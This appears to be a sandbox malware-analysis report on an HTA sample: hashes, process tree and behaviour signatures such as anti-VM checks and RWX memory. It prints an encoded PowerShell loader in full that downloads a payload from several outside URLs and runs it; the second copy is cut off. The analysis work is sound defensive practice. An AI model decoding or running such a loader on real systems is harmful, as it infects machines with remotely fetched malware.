Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 20, 2023, 11:16 a.m.	April 20, 2023, 11:18 a.m.

Size	369.6KB
Type	UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5	`3e225779f6f92a4f8e31b8a5aadb79ea`
SHA256	`0cd065450571f0b7234268b3ed01e4ed4e53d471cfc736c6c9494eb3ee9dccc8`
CRC32	`C3E5678F`
ssdeep	`6144:clmYI1ekfrnIOrje1Tq/kLuXX7fX+mrF9vQsxWNKsuS7qUNEOlQmJ8n0mR5lmYIG:c65fu+XxQ7KDmy0665f2`
Yara	Generic_Malware_Zero - Generic Malware

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Sbiqfcpir.hta
940
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAVQBuAHAAbwBpAHMAbwBuAGUAZABQAHIAaQBuAGMAaQBwAGEAbABpAHQAaQBlAHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBoAG8AdABlAGwAbABvAHMAbQBpAHIAdABvAHMALgBjAG8AbQAvAHMAagBuAC8AUABRAGkAeQBOAGYAcgBtAFUAbQAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwA1AHgAeQBJAHQAYQA0AEoALABoAHQAdABwAHMAOgAvAC8AYwBpAHQAeQB0AGUAYwBoAC0AcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvADYATQBoADEAawAvAGIATABkAGQAbwBDADUAdwAsAGgAdAB0AHAAcwA6AC8ALwB6AGEAaQBuAGMAbwAuAG4AZQB0AC8ATwBkAE8AVQAvAGkAdwBqAHYAVwBXAFEASwAxAEwAWABHACwAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAGYAdQBtAEIARQA0AGgAbABtADkALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBUADgAWABlAFUAVAByAGEALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AOQB2AFkAdABtAFoALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwAwADgAagBYAEIANABYADkAQgBGACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGcAaQBlAEEAbQBhAGsAZQBiAGUAIABpAG4AIAAkAFUAbgBwAG8AaQBzAG8AbgBlAGQAUAByAGkAbgBjAGkAcABhAGwAaQB0AGkAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABnAGkAZQBBAG0AYQBrAGUAYgBlACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABEAGUAYwBhAG4AbwBsAC4AZQB4AGkAZwBpAGIAbABlAFAAbABlAHQAaABvAHIAYQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEQAZQBjAGEAbgBvAGwALgBlAHgAaQBnAGkAYgBsAGUAUABsAGUAdABoAG8AcgBhACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAEUAQQBHAFUAQQBZAHcAQgBoAEEARwA0AEEAYgB3AEIAcwBBAEMANABBAFoAUQBCADQAQQBHAGsAQQBaAHcAQgBwAEEARwBJAEEAYgBBAEIAbABBAEYAQQBBAGIAQQBCAGwAQQBIAFEAQQBhAEEAQgB2AEEASABJAEEAWQBRAEEAcwBBAEUAMABBAGIAdwBCADAAQQBHAFEAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="
  2152

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 20, 2023, 11:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 11:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 11:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 11:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 20, 2023, 11:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 20, 2023, 11:16 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 20, 2023, 11:16 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ffd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 20, 2023, 11:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00310498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 20, 2023, 11:16 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 264 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f70000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f70000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f73000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f73000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f73000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f74000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f74000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f75000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f75000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f75000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f75000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f75000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f75000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f76000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f76000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f76000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f76000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f77000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f78000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f79000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f7a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f7a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f7a000 process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAVQBuAHAAbwBpAHMAbwBuAGUAZABQAHIAaQBuAGMAaQBwAGEAbABpAHQAaQBlAHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBoAG8AdABlAGwAbABvAHMAbQBpAHIAdABvAHMALgBjAG8AbQAvAHMAagBuAC8AUABRAGkAeQBOAGYAcgBtAFUAbQAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwA1AHgAeQBJAHQAYQA0AEoALABoAHQAdABwAHMAOgAvAC8AYwBpAHQAeQB0AGUAYwBoAC0AcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvADYATQBoADEAawAvAGIATABkAGQAbwBDADUAdwAsAGgAdAB0AHAAcwA6AC8ALwB6AGEAaQBuAGMAbwAuAG4AZQB0AC8ATwBkAE8AVQAvAGkAdwBqAHYAVwBXAFEASwAxAEwAWABHACwAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAGYAdQBtAEIARQA0AGgAbABtADkALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBUADgAWABlAFUAVAByAGEALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AOQB2AFkAdABtAFoALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwAwADgAagBYAEIANABYADkAQgBGACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGcAaQBlAEEAbQBhAGsAZQBiAGUAIABpAG4AIAAkAFUAbgBwAG8AaQBzAG8AbgBlAGQAUAByAGkAbgBjAGkAcABhAGwAaQB0AGkAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABnAGkAZQBBAG0AYQBrAGUAYgBlACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABEAGUAYwBhAG4AbwBsAC4AZQB4AGkAZwBpAGIA